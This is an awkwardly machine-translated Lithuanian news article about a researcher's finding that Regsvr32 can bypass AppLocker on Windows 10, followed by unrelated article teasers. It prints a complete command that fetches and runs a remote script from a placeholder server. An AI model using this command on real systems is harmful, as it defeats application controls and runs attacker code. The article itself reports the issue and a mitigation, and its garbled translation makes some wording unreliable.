„Regsvr32“ gali būti naudojamas apeiti programuotoją „Windows 10“
Video: Windows 10 Build 20236 - Meet Now, 10X OOBE, Settings, UI Tweaks + MORE 2024
Kolorado tyrinėtojas, vardu Casey Smith, išsiaiškino, kad „Regsvr32“ gali būti naudojamas apeiti „AppLocker“ „Windows 10“, ir tai yra didžiulė problema kompiuterių vartotojams, ypač esantiems verslo aplinkoje.
„AppLocker“ pirmą kartą buvo pristatyta „Windows 7“ ir „Windows Server 2008 R2“. Ji sukurta tam, kad administratoriai galėtų nurodyti, kuri grupė ar vartotojai gali naudotis kai kuriomis ar visomis programomis, remdamiesi unikalia failų tapatybe. Jei esate asmuo, linkęs naudoti „AppLocker“, tada turėtų būti gerai žinoma, kad jis gali būti naudojamas kuriant tam tikras taisykles, leidžiančias programoms paleisti ar sustabdyti jas savo trasose.
Tiems, kurie gali to nesuvokti, „Regvr32“ gali būti naudojamas registruoti ir išregistruoti DLL. Tai nėra vieno mygtuko paspaudimo įrankis, nes tai yra komandinės eilutės įrankis, todėl tik patyrę kompiuterių vartotojai turėtų stengtis pasinaudoti jo teikiamomis galimybėmis.
Mes suprantame, kad naudojant šią techniką jis nepakeičia kompiuterinės sistemos registro, todėl administratoriams tampa sunku žinoti, ar buvo atlikti pakeitimai.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
„Nuostabus dalykas yra tai, kad„ regsvr32 “jau žino tarpinį serverį, naudoja TLS, seka peradresavimus ir pan.… Ir… Jūs atspėjote pasirašytą, numatytąjį MS dvejetainį kodą. Taigi viskas, ką jums reikia padaryti, yra priglobti „your.sct“ failą jūsų kontroliuojamoje vietoje “, - rašė Smithas.
Aukščiau pateikta technika nereikalauja administracinių teisių ir nekeičia registro. Be to, scenarijus galima iškviesti per HTTP arba HTTPS. Šiuo metu „Microsoft“ neišleido šios mažos problemos pataisos, todėl šiuo metu vienintelė galimybė yra užblokuoti „Regsvr32“ per „Windows“ ugniasienę.
Įdomu tai, kad programinės įrangos milžinė dar turi atsakyti į šią saugos problemą, su kuria susiduria jo operacinė sistema. Dabar, kai jis atviras, tikimės išgirsti ką nors iš bendrovės kartu su derybomis apie būsimą pleistrą.
Pataisyti: 'tas raktas negali būti naudojamas suaktyvinti šią „Windows“ klaidos versiją
Jei esate vienas iš „Windows 8“ vartotojų, kurie bando įdiegti operacinę sistemą ir gausite pranešimą „Tas klavišas negali būti naudojamas suaktyvinti šią„ Windows “versiją“, tai yra instrukcija, specialiai sukurta jums. Norėdami gauti daugiau informacijos apie tai, kaip galite išspręsti problemą ...
Kaip tai apeiti, atrodo, kad kažkas kitas gali naudoti jūsų sąskaitos pranešimą
Kartais gali nepavykti prisijungti prie savo sąskaitos ir gausite Panašu, kad kažkas kitas naudoja jūsų paskyros klaidos pranešimą. Ši problema gali paveikti jūsų el. Paštą, „Skype“ ir „Xbox“ paskyras, todėl šiandien parodysime, kaip išspręsti šią problemą „Windows 10“. Kaip apeiti ...
„Msdn“ vartotojai dabar gali atsisiųsti „Windows 10“ gali būti atnaujinti 2019 m. Gegužės mėn
MSDN abonentai dabar gali pasiekti „Windows“ 2019 m. Gegužės 10 d. Naujinimo (1903 versija) ISO failus ir atsisiųsti naujinimą savo asmeniniuose kompiuteriuose.